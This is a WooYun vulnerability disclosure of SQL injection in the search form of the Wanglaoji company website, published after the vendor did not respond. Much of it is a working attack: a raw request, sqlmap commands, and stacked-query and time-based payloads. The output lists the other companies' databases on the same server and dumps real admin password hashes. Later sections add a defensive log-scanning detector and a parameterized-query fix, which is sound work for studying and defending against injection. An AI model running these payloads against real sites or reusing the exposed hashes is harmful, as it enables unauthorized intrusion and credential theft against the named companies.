
Vulnerability summary

Defect ID: wooyun-2015-0107471

Title: SQL injection on the Wanglaoji official site exposes usernames, passwords and other sensitive data (and reaches other sites' databases)

Vendor: Guangzhou Wanglaoji Pharmaceutical Co., Ltd. (广州王老吉药业股份有限公司)

Author: 路人甲

Submitted: 2015-04-14 15:54

Fix deadline: 2015-05-29 15:54

Published: 2015-05-29 15:54

Type: SQL injection

Severity: Medium

Self-assessed Rank: 8

Status: Vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-14: Contacting the vendor and waiting for them to claim the report; details withheld from the public
2015-05-29: The vendor has actively ignored the vulnerability; details are now public

Brief description:

Details:

A POST parameter of the search function is injectable. After getting in, it turned out the same database server also hosts the databases of several other companies' websites:
Guangzhou Light Industry (广州轻工): http://www.gzlig.com/
Grandbuy Group (广百集团): http://gbjt.com.cn/
Shenzhen Golden Phoenix Furniture (深圳市金凤凰家具): http://szjfh.com/
Hotata (好太太): http://www.hotata.com/
I did not dig further to confirm whether those companies' web front ends are injectable as well, but the homepage HTML of each of them carries:
<meta name="Author" content="优网科技 www.uweb.net.cn LiLee">
so they were presumably all built by the same developer, 优网科技, which makes fixing this well worth it.

Proof:

Submit a search request. The raw HTTP request (saved as 2.txt, the file passed to sqlmap with -r below) is:
———————————————————————————————————————————
POST /en/search.aspx HTTP/1.1
Content-Length: 13
Content-Type: application/x-www-form-urlencoded
Referer: http://www.wlj.com.cn:80/
Cookie: ASP.NET_SessionId=ttaojnm3mp4jq0zhsq510xma; CheckCode=60R6
Host: www.wlj.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
keyword=1
———————————————————————————————————————————
Enumerate the databases with sqlmap, trying Microsoft SQL Server as the DBMS:
sqlmap.py -r 2.txt --dbs -p keyword --dbms "Microsoft SQL Server"
---
Place: POST
Parameter: keyword
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: keyword=1'); WAITFOR DELAY '0:0:5';--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: keyword=1') WAITFOR DELAY '0:0:5'--
---
available databases [38]:
[*] [aspnet63\x02]
[*] aspnet50
[*] aspnet52
[*] bbsopweiyuiom
[*] bbssuofeiya
[*] chinazocecom
[*] coursefanscom2
[*] dboppeintest2
[*] dboupaimumen
[*] gbjtcomcn
[*] gyzxxsycn
[*] gzlglibcom1
[*] gzligcom
[*] gzsummitcom
[*] haitianfoodc
[*] holikecomcn2
[*] holikecomcn21
[*] holikecomco22
[*] hotatacom
[*] iangzhuncom
[*] liwanyiyuan
[*] LLBGDCYLORG
[*] master
[*] model
[*] msdb
[*] naoyounetcn
[*] oppeincn1
[*] oppeincns63
[*] pearl@iverpia2
[*] s63dbspwljcom
[*] sanjinyuacom
[*] shenlaohrcom
[*] suofeiyacomc
[*] szjfhcom
[*] tempdb
[*] wljcomcn
[*] zhupai2
[*] zy813zycom
Locate the Wanglaoji database, wljcomcn, and enumerate its tables:
sqlmap.py -r 2.txt -p keyword --dbms "Microsoft SQL Server" -D wljcomcn --tables
Database: wljcomcn
[33 tables]
+------------------+
| dbo.DB_Adplica |
| dbo.DB_Ads |
| dbo.DB_Comm |
| dbo.DB_Company |
| dbo.DB_DFile |
| dbo.DB_Deeptree |
| dbo.DB_FLink |
| dbo.DB_Feedback |
| dbo.DB_Feedback2 |
| dbo.DB_Feedback3 |
| dbo.DB_Feedback4 |
| dbo.DB_News |
| dbo.DB_Order |
| dbo.DB_Products |
| dbo.DB_Recommend |
| dbo.DB_Resume |
| dbo.DB_SNov |
| dbo.DB_SerachA |
| dbo.DB_Tv |
| dbo.DB_UGroup |
| dbo.DB_cam |
| dbo.DB_zy |
| dbo.Sys_Site |
| dbo.[DB_bz!] |
| dbo.sys_UserInfo |
| dbo.sys_admin |
| dbo.sys_em |
| dbo.sys_emgroup |
| dbo.sys_emlist |
| dbo.sys_gather |
| dbo.sys_menu |
| dbo.sys_note |
| dbo.sys_tmpnews |
+------------------+
dbo.sys_admin stands out; enumerate its columns (some names and types come back corrupted: time-based blind extraction infers one character per timed request, so any network jitter that makes a false test look like a delay yields wrong bytes such as \x05):
sqlmap.py -r 2.txt -p keyword --dbms "Microsoft SQL Server" -D wljcomcn -T dbo.sys_admin --columns
Database: wljcomcn
Table: dbo.sys_admin
[9 columns]
+-----------------+----------+
| Column | Type |
+-----------------+----------+
| [username\x05A] |
| [wQa\x11] |
| addtime | datetխme |
| adminClass | int\t |
| id | int |
| namq |
| parts | ntext |
| passwords | nvarchar |
| ver | nvarchar |
+-----------------+----------+
Now dump the passwords (the same caveat applies: rows containing \x.. bytes or ? are partly mis-inferred; the clean row is 32 hexadecimal characters, the length of an MD5 digest):
sqlmap.py -r 2.txt -p keyword --dbms "Microsoft SQL Server" -D wljcomcn -T dbo.sys_admin -C passwords --dump
Database: wljcomcn
Table: dbo.sys_admin
[8 entries]
+----------------------------------------------+
| passwords |
+----------------------------------------------+
| 50a5c3=83f67a0afb907fd6a46108?7b |
| 50a5c3983f67a0afb907fd6a4610837b |
| 5f484kf8e80ds7a78cA?x?97?f1\x9bfb4?a? |
| ?@0\x816fbd524c\x814fd2<1112A174=de8cd |
| a0a6c3a8?f67a\x81afb9O7f\x7f6\x814l109@7dA\r |
| a634\x81830655c53c5c6c37b3344a8@50e |
| \x7f6A44?30@55h?3c5c6c37b3<44a80?0?A |
| 6?538b89436baa59c344e4bf10fa61c8 |
+----------------------------------------------+
OK, that's enough; let me finish the can of Wanglaoji in my hand...
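Detection logic for the probes shown above, run over request logs. This is an added example, not sqlmap's or the site's code. The log format is an assumption (one request per line, "<timestamp> <method> <path> [<url-encoded body>]", as a reverse proxy or WAF that records POST bodies could write it), and the sample lines are constructed: the keyword values copy the two payloads sqlmap reported for www.wlj.com.cn, add a boolean variant of the kind sqlmap tries on the way there, and mix in benign traffic.

```python
"""Flag time-based, stacked and boolean SQL injection probes in request logs.

Added example, not sqlmap's or the site's code. Log format and sample lines
are constructed (see the lead-in above)."""
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample log. Lines 2 and 3 carry the payloads sqlmap reported;
# line 5 is a boolean probe; line 6 shows that the word "waitfor" on its own
# does not fire the time-based signature.
SAMPLE_LOG = """\
2015-04-14T15:40:01 POST /en/search.aspx keyword=1
2015-04-14T15:40:03 POST /en/search.aspx keyword=1%27%29%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3B--
2015-04-14T15:40:09 POST /en/search.aspx keyword=1%27%29+WAITFOR+DELAY+%270%3A0%3A5%27--
2015-04-14T15:40:12 POST /en/search.aspx keyword=wanglaoji+tea
2015-04-14T15:40:15 POST /en/search.aspx keyword=1%27+AND+%28SELECT+COUNT%28%2A%29+FROM+sysobjects%29%3E0--
2015-04-14T15:40:20 GET /en/search.aspx?keyword=waitfor
"""

# Checked against the decoded, lower-cased, comment-stripped parameter value.
# The first two match the two techniques sqlmap reported (time-based blind and
# stacked queries); the rest catch boolean and comment-terminated variants.
SIGNATURES = [
    ("time-based blind (WAITFOR DELAY)", re.compile(r"\bwaitfor\s+delay\b")),
    ("stacked query", re.compile(r";\s*(?:waitfor|select|insert|update|delete|drop|exec|declare|create)\b")),
    ("time-based blind (sleep/benchmark)", re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(")),
    ("quote break + boolean", re.compile(r"'\s*\)*\s*(?:or|and)\b")),
    ("comment terminator", re.compile(r"--\s*$")),
]

def normalize(value):
    """Undo cheap evasions: inline /* */ comments and whitespace variants."""
    value = re.sub(r"/\*.*?\*/", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()

def classify(value):
    """Return the names of every signature that fires on one parameter value."""
    text = normalize(value)
    return [name for name, rx in SIGNATURES if rx.search(text)]

def parse_line(line):
    """Split a log line into (timestamp, method, path, body); body is '-' when absent."""
    ts, method, path, body = (line.split(" ", 3) + ["-"])[:4]
    return ts, method, path, body

def extract_params(path, body):
    """Yield (name, value) for query-string and form-body parameters, URL-decoded once."""
    yield from parse_qsl(urlsplit(path).query, keep_blank_values=True)
    if body != "-":
        yield from parse_qsl(body, keep_blank_values=True)

def scan_log(text):
    """Return one finding per (line, parameter) on which any signature fires."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        ts, method, path, body = parse_line(line)
        for name, value in extract_params(path, body):
            tags = classify(value)
            if tags:
                findings.append({"line": lineno, "time": ts, "method": method,
                                 "path": urlsplit(path).path, "param": name,
                                 "value": value, "tags": tags})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} {f['time']} {f['method']} {f['path']} "
              f"{f['param']}={f['value']!r}: {', '.join(f['tags'])}")
```

The signatures are deliberately keyed on SQL structure after decoding rather than on raw bytes, because sqlmap URL-encodes the payload and its tamper scripts vary case and insert inline comments; a rule that looks for the literal string "WAITFOR DELAY" in the raw log would miss the request exactly as it was sent here. Time-based blind extraction is also noisy by nature: one character costs several requests to the same endpoint, each with a delay clause, so a burst of matching requests from one session (the ASP.NET_SessionId cookie above) is a far stronger signal than any single line.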

Remediation:

Filter the input. Filtering alone is not enough, though: pass keyword to the query as a bound parameter (SqlParameter on SqlCommand in ASP.NET) instead of concatenating it into the SQL string, and run the site under a database login that can see only its own database, so that one injectable site cannot be used to read every other database on the same instance as happened here.
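The vulnerable query shape beside the parameterized fix, as an added example; this is not the site's ASP.NET code. SQLite stands in for SQL Server, the table is a constructed stand-in for wljcomcn.dbo.sys_admin (only the column names come from the report, the rows are made up), and because SQLite has no WAITFOR DELAY the attacker inputs are the boolean and UNION forms that the same injection point admits. The exact query the site builds is unknown; the parenthesised LIKE is an assumption based on the `')` prefix in sqlmap's payload.

```python
"""String-concatenated query versus a bound parameter, with the injection
point shape inferred from the report's payloads.

Added example, not the site's code. SQLite stands in for SQL Server and the
table is a constructed stand-in for wljcomcn.dbo.sys_admin."""
import sqlite3

def make_db():
    """In-memory stand-in for the admin table, with placeholder hashes."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sys_admin (id INTEGER PRIMARY KEY, username TEXT, passwords TEXT)")
    con.executemany("INSERT INTO sys_admin (username, passwords) VALUES (?, ?)",
                    [("admin", "<hash-1>"), ("editor", "<hash-2>"), ("webmaster", "<hash-3>")])
    return con

def search_vulnerable(con, keyword):
    """Concatenation. The ') in sqlmap's payload says the real keyword lands inside
    a parenthesised string literal; this shape reproduces that (an assumption
    about the original code, not a copy of it)."""
    sql = "SELECT username FROM sys_admin WHERE username LIKE ('%" + keyword + "%')"
    return [row[0] for row in con.execute(sql)]

def search_fixed(con, keyword):
    """Bound parameter: the keyword travels as data and is never parsed as SQL.
    SqlCommand with SqlParameter is the ASP.NET equivalent."""
    sql = "SELECT username FROM sys_admin WHERE username LIKE '%' || ? || '%'"
    return [row[0] for row in con.execute(sql, (keyword,))]

if __name__ == "__main__":
    con = make_db()
    for kw in ("adm", "x') OR 1=1--", "x') UNION SELECT passwords FROM sys_admin--"):
        print(f"{kw!r:50} vulnerable={search_vulnerable(con, kw)} fixed={search_fixed(con, kw)}")
```

With the concatenated query the boolean payload returns every account and the UNION payload returns the passwords column, which is the data the report dumped; with the bound parameter both payloads are just search strings that match nothing. The `;` in sqlmap's stacked-queries payload goes one step further on SQL Server, where a second statement runs with whatever rights the application's login holds, and the database listing above shows that login could see every database on the instance. A login scoped to wljcomcn alone would have limited the blast radius even before the query was fixed.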

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vendor response

Vendor reply:

Unable to reach the vendor, or the vendor actively declined

Vulnerability Rank: 8 (WooYun rating)